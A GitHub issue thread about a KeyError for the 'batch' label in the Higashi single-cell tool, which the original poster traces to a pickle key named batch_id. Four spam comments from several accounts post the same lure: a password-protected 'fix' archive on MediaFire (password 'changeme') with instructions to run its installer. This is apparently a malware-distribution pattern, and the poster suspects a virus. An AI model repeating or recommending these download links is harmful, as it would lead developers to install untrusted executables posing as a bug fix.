### ISSUE TITLE
key error

### ISSUE THREAD

**Issue by a1e-the** [ma-compbio/Higashi#55]
KeyError Traceback (most recent call last) Cell In[4], line 11 9 vec = UMAP(n_components=2, n_neighbors=25, random_state=0).fit_transform(cell_embeddings) 10 cell_type = higashi_model.label_info['cell type'] ---> 11 batch = higashi_model.label_info['batch'] 12 fig = plt.figure(figsize=(14, 5)) 13 ax = plt.subplot(1, 2, 1) KeyError: 'batch'

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by a1e-the** [comment]
I just solved the problem and try to show the method.
the pickle file you fetched from https://drive.google.com/drive/u/1/folders/1j7ffz96kv_Ft3hicu2DRBmfcje0RA1sc
there is a key error , named batch_id, just edit it to batch, you will be ok.

by the way, the replys above seem virus, i don't know, they just replied immediately, don't touch them.

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by a1e-the** [comment]
oh, i just found the reason, and there is nothing wrong with the file.
